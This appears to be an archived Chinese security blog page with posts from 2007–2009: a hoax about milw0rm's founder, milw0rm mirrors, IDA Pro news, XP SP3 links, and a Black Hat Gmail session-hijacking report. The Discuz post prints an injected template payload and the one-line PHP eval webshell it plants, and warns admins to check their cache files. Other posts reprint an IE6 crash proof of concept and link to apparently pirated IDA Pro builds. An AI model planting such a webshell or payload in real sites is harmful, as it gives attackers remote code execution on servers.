R.I.P Str0ke is still alive:)
作者:ZhaoHuAn 日期:2009-11-05
引用内容"Hi,
I know by now that many of you have seen the story at...
http://bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html
I know this because MANY of you have written me off-list with the message "have
you heard the news?"... If I did not personally reply, I am sorry, but my inbox
has been swamped today.
Well, good news and bad news here.
Bad news first. The above story is a hoax. Str0ke is alive, well, and kicking.
Don't feel bad. Many of the best in the industry got taken in by the story. I
fell for it, too -- hook, line, and sinker. Oh well, live and learn.
Now the good news. The folks at OffSec, along with David Kennedy and others, are
talking over milw0rm from stroke. Read the announcement here:
http://www.offensive-security.com/blog/
I had just talked with Muts yesterday about another issue, and he indicated that...
I know by now that many of you have seen the story at...
http://bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html
I know this because MANY of you have written me off-list with the message "have
you heard the news?"... If I did not personally reply, I am sorry, but my inbox
has been swamped today.
Well, good news and bad news here.
Bad news first. The above story is a hoax. Str0ke is alive, well, and kicking.
Don't feel bad. Many of the best in the industry got taken in by the story. I
fell for it, too -- hook, line, and sinker. Oh well, live and learn.
Now the good news. The folks at OffSec, along with David Kennedy and others, are
talking over milw0rm from stroke. Read the announcement here:
http://www.offensive-security.com/blog/
I had just talked with Muts yesterday about another issue, and he indicated that...
Discuz 3rd Party攻击第三波出现了
作者:ZhaoHuAn 日期:2009-08-20
不知道又是哪个同学的杰作 初步预测是劫持了customer.discuz.net 再配合自定义模板变量那个漏洞 管理员访问后台时 便会生成一个一句话后门
引用内容
/forumdata/cache/usergroup_0.php
程序代码
对post的变量b进行md5加密,如果第28-31的位置是7aaa(32位MD5的后四位)的话 就执行eval($_POST['a']);
这个验证很YD啊。。
估计最近很多大站被黑都是出自这个东东吧~
使用DZ论坛的同学请自行检查一下/forumdata/cache/下的文件
相关讨论:
警惕Third Party Content攻击
[url=http://discuz.net/viewthread.php?tid=1385006&extra=page%3D1&page=1]Discuz...
引用内容自定义模板变量:
变 量 : {','');ECHO '';$X=SUBSTR(MD5($_GET['B']),28);IF($X=='7aaa')EVAL($_POST['A']);//}
替换内容 : aaaaaaaaaa
变 量 : {','');ECHO '';$X=SUBSTR(MD5($_GET['B']),28);IF($X=='7aaa')EVAL($_POST['A']);//}
替换内容 : aaaaaaaaaa
/forumdata/cache/usergroup_0.php
程序代码<?php (substr(md5($_POST['b']),28)=='7aaa') && eval($_POST['a']);?>
对post的变量b进行md5加密,如果第28-31的位置是7aaa(32位MD5的后四位)的话 就执行eval($_POST['a']);
这个验证很YD啊。。
估计最近很多大站被黑都是出自这个东东吧~
使用DZ论坛的同学请自行检查一下/forumdata/cache/下的文件
相关讨论:
警惕Third Party Content攻击
[url=http://discuz.net/viewthread.php?tid=1385006&extra=page%3D1&page=1]Discuz...
milw0rm的镜像&程序
作者:ZhaoHuAn 日期:2009-07-09
前天听说milw0rm关闭了,真是个不幸的消息啊:(
今天上去找一个exp的时候,发现milw0rm已经打不开了,记得inj3ct0r以前自己做了个milw0rm的镜像,地址是http://inj3ct0r.com
貌似是目前国内能打开的一个数据还算比较完整的镜像站(要是有兄弟还有更好赶紧放出来吧 呵呵)
可以理解维护像milw0rm的站点是一件非常耗费时间和精力的事,不光要考虑到站点程序、数据库、服务器的维护,还有每天庞大的exploits要测试……
另外有兴趣的同学也可以YY个新的milw0rm出来~
程序在:
http://www.book.amjad.ws/save.php?action=save&id=41
数据库配置文件:
ozellikler.php
DB: milw0rm.sql
相信milw0rm还是会继续的 希望str0ke牛能找到一个好的接班人来接手她:)
PS:到上海了,14号到公司报到,这几个月实在是忙啊~
今天上去找一个exp的时候,发现milw0rm已经打不开了,记得inj3ct0r以前自己做了个milw0rm的镜像,地址是http://inj3ct0r.com
貌似是目前国内能打开的一个数据还算比较完整的镜像站(要是有兄弟还有更好赶紧放出来吧 呵呵)
可以理解维护像milw0rm的站点是一件非常耗费时间和精力的事,不光要考虑到站点程序、数据库、服务器的维护,还有每天庞大的exploits要测试……
另外有兴趣的同学也可以YY个新的milw0rm出来~
程序在:
http://www.book.amjad.ws/save.php?action=save&id=41
数据库配置文件:
ozellikler.php
DB: milw0rm.sql
相信milw0rm还是会继续的 希望str0ke牛能找到一个好的接班人来接手她:)
PS:到上海了,14号到公司报到,这几个月实在是忙啊~
IDA Pro 5.3 feature list
作者:ZhaoHuAn 日期:2008-07-17
IDA Pro 5.3 feature list
New and improved debugger
The previous version of IDA Pro did not add anything to the debugger and we felt it is time for changes. We reimplemented the debugger core and improved the debugger modules.
The new debugger is more efficient and has better support for multithreaded applications. Breakpoint handling is faster, more logical and less deadlocking. Exception handling is more user friendly.
The debugger servers are multithreaded: they can handle multiple debug sessions, no need to kill a hung server or run multiple copies.
Debugger modules
We added two new debugger targets:
iPhone debugger. Click here for the details.
Symbian OS debugger. Click here for the details.
We publish the source code of all debugger modules.
The Linux debugger module has been improved to support multithreaded applications. We support NPTL based kernels.
Better analysis for PC and ARM...
New and improved debugger
The previous version of IDA Pro did not add anything to the debugger and we felt it is time for changes. We reimplemented the debugger core and improved the debugger modules.
The new debugger is more efficient and has better support for multithreaded applications. Breakpoint handling is faster, more logical and less deadlocking. Exception handling is more user friendly.
The debugger servers are multithreaded: they can handle multiple debug sessions, no need to kill a hung server or run multiple copies.
Debugger modules
We added two new debugger targets:
iPhone debugger. Click here for the details.
Symbian OS debugger. Click here for the details.
We publish the source code of all debugger modules.
The Linux debugger module has been improved to support multithreaded applications. We support NPTL based kernels.
Better analysis for PC and ARM...
Sp3
作者:ZhaoHuAn 日期:2008-04-29
*
http://download.windowsupdate.com/msdownload/update/software/svpk/2008/04/windowsxp-kb936929-sp3-x86-enu_c81472f7eeea2eca421e116cd4c03e2300ebfde4.exe
sp3英文版
MD5:bb25707c919dd835a9d9706b5725af58
http://download.windowsupdate.com/msdownload/update/software/svpk/2008/04/windowsxp-kb936929-sp3-x86-chs_D7067E86ABD4257454200D0C398D71C4CE6CD33E.exe
sp3中文版
http://download.windowsupdate.com/msdownload/update/software/svpk/2008/04/windowsxp-kb936929-sp3-x86-enu_c81472f7eeea2eca421e116cd4c03e2300ebfde4.exe
sp3英文版
MD5:bb25707c919dd835a9d9706b5725af58
http://download.windowsupdate.com/msdownload/update/software/svpk/2008/04/windowsxp-kb936929-sp3-x86-chs_D7067E86ABD4257454200D0C398D71C4CE6CD33E.exe
sp3中文版
IDA.Pro.Advanced.v5.1.0.899-YAG
作者:ZhaoHuAn 日期:2007-10-10
√DataRescue.IDA.Pro.Advanced.v5.1.0.899-YAG开始放IDA V5.1了
DataRescue.IDA.Pro.Advanced.v5.1.Linux-YAG
http://219.153.5.141/IDA.Pro.Advanced.v5.1/IDA.Pro.Advanced.v5.1.0.899.Linux.rar
DataRescue.IDA.Pro.Advanced.v5.1.Mac.OSX-YAG
http://219.153.5.141/IDA.Pro.Advanced.v5.1/IDA.Pro.Advanced.v5.1.0.899.Mac.OSX.rar
DataRescue.IDA.Pro.Advanced.v5.1.0.899-YAG
http://219.153.5.141/IDA.Pro.Advanced.v5.1/IDA.Pro.Advanced.v5.1.0.899.Windows.rar
DataRescue.IDA.Pro.Advanced.v5.1.Linux-YAG
http://219.153.5.141/IDA.Pro.Advanced.v5.1/IDA.Pro.Advanced.v5.1.0.899.Linux.rar
DataRescue.IDA.Pro.Advanced.v5.1.Mac.OSX-YAG
http://219.153.5.141/IDA.Pro.Advanced.v5.1/IDA.Pro.Advanced.v5.1.0.899.Mac.OSX.rar
DataRescue.IDA.Pro.Advanced.v5.1.0.899-YAG
http://219.153.5.141/IDA.Pro.Advanced.v5.1/IDA.Pro.Advanced.v5.1.0.899.Windows.rar
MS07-042 XMLDOM substringData() PoC
作者:ZhaoHuAn 日期:2007-08-16
程序代码Alla Bezroutchko <alla_at_scanit.be>
Date: Thu, 16 Aug 2007 11:32:10 +0200
This bit of JavaScript kills IE 6 on Windows 2000 and Windows XP SP2
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.loadXML("<dummy></dummy>");
var txt = xmlDoc.createTextNode("huh");
var out = txt.substringData(1,0x7fffffff);
Installing the patch from MS07-042 fixes it.
Cheers,
Alla Bezroutchko
Scanit - http://www.scanit.be/
Date: Thu, 16 Aug 2007 11:32:10 +0200
This bit of JavaScript kills IE 6 on Windows 2000 and Windows XP SP2
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.loadXML("<dummy></dummy>");
var txt = xmlDoc.createTextNode("huh");
var out = txt.substringData(1,0x7fffffff);
Installing the patch from MS07-042 fixes it.
Cheers,
Alla Bezroutchko
Scanit - http://www.scanit.be/
//微软也很速度的发布了补丁。
黑帽安全大会:Gmail遭遇破解
作者:ZhaoHuAn 日期:2007-08-05
事实上这个攻击可以截取几乎所有基于cookie的网络应用程序,顺利通过Graham“测试”的网络邮箱有Google的Gmail,微软的Hotmail,还有Yahoo Mail。他强调这些应用程序仅仅使用cookie,因此他不需要用户名和密码,只要IP地址即可。
“我收到了一封邮件写着:我喜欢羊。但这封邮件不是我朋友发的——而是来自于假借我朋友之名的黑客。”
在最近召开的黑帽安全大会(Black Hat security convention)上,Errata Security的CEO Robert Graham劫持了Gmail会话并阅读其邮件内容,让所有在座的人都吃了一惊。更进一步,他还亲自示范了通过一个记者的Gmail帐号给大家发送邮件,就是前面那封对羊表示好感的邮件。
攻击实际上很简单,首先Graham需要截获数据包。在大会现场我们用的是Wi-Fi无线网络,正合适。然后Graham用Ferret嗅探满会场飞舞的所有cookie,复制给他自己的浏览器——用一个叫做Hamster的小工具。
事实上这个攻击可以截取几乎所有基于cookie的网络应用程序,顺利通过Graham“测试”的网络邮箱有Google的Gmail,微软的Hotmail,还有Yahoo Mail。他强调这些应用程序仅仅使用cookie,因此他不需要用户名和密码,只要IP地址即可。
ZDNet的技术主管和编辑George Ou主动作为测试者,新建了一个Gmail帐号getmehacked@gmail.com,通过黑帽安全大会的Wi-Fi网络登陆并发送邮件,在Ou打字的时候,Graham运行Ferret嗅探到Ou和Google之间发送的cookie,然后点击了Ou的IP以及Gmail页面,所有Ou最近发送的消息都显示在屏幕上。
既然攻击依靠对流量进行嗅探,那么使用SSL或其他类型的加密措施(比如VPN)就能阻止Graham的破解。然而,大部分在公共场合无线热区上网的...
“我收到了一封邮件写着:我喜欢羊。但这封邮件不是我朋友发的——而是来自于假借我朋友之名的黑客。”
在最近召开的黑帽安全大会(Black Hat security convention)上,Errata Security的CEO Robert Graham劫持了Gmail会话并阅读其邮件内容,让所有在座的人都吃了一惊。更进一步,他还亲自示范了通过一个记者的Gmail帐号给大家发送邮件,就是前面那封对羊表示好感的邮件。
攻击实际上很简单,首先Graham需要截获数据包。在大会现场我们用的是Wi-Fi无线网络,正合适。然后Graham用Ferret嗅探满会场飞舞的所有cookie,复制给他自己的浏览器——用一个叫做Hamster的小工具。
事实上这个攻击可以截取几乎所有基于cookie的网络应用程序,顺利通过Graham“测试”的网络邮箱有Google的Gmail,微软的Hotmail,还有Yahoo Mail。他强调这些应用程序仅仅使用cookie,因此他不需要用户名和密码,只要IP地址即可。
ZDNet的技术主管和编辑George Ou主动作为测试者,新建了一个Gmail帐号getmehacked@gmail.com,通过黑帽安全大会的Wi-Fi网络登陆并发送邮件,在Ou打字的时候,Graham运行Ferret嗅探到Ou和Google之间发送的cookie,然后点击了Ou的IP以及Gmail页面,所有Ou最近发送的消息都显示在屏幕上。
既然攻击依靠对流量进行嗅探,那么使用SSL或其他类型的加密措施(比如VPN)就能阻止Graham的破解。然而,大部分在公共场合无线热区上网的...
